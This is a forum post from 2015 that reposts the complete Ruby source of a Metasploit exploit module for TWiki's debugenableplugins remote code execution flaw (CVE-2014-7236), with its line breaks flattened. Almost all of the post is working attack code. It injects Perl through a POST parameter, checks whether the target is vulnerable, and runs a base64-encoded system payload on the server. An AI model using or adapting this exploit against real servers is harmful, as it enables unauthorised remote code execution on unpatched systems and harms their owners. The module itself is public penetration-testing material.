Aerosol Posted March 19, 2015 Report Posted March 19, 2015 ### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'TWiki Debugenableplugins Remote Code Execution', 'Description' => %q{ TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution }, 'Author' => [ 'Netanel Rubin', # from Check Point - Discovery 'h0ng10', # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-7236'], [ 'OSVDB', '112977'], [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236'] ], 'Privileged' => false, 'Targets' => [ [ 'Automatic', { 'Payload' => { 'BadChars' => "", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python php', } }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 09 2014')) register_options( [ OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]), OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin']) ], self.class) end def send_code(perl_code) uri = target_uri.path data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit" res = send_request_cgi!({ 'method' => 'POST', 'uri' => uri, 'data' => data }) return res end def check rand_1 = rand_text_alpha(5) rand_2 = rand_text_alpha(5) code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")" res = send_code(code) if res and res.code == 200 return CheckCode::Vulnerable if res.body == rand_1 + rand_2 end CheckCode::Unknown end def exploit code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");" code += "require('MIME/Base64.pm');MIME::Base64->import();" code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit" res = send_code(code) handler endendSource Quote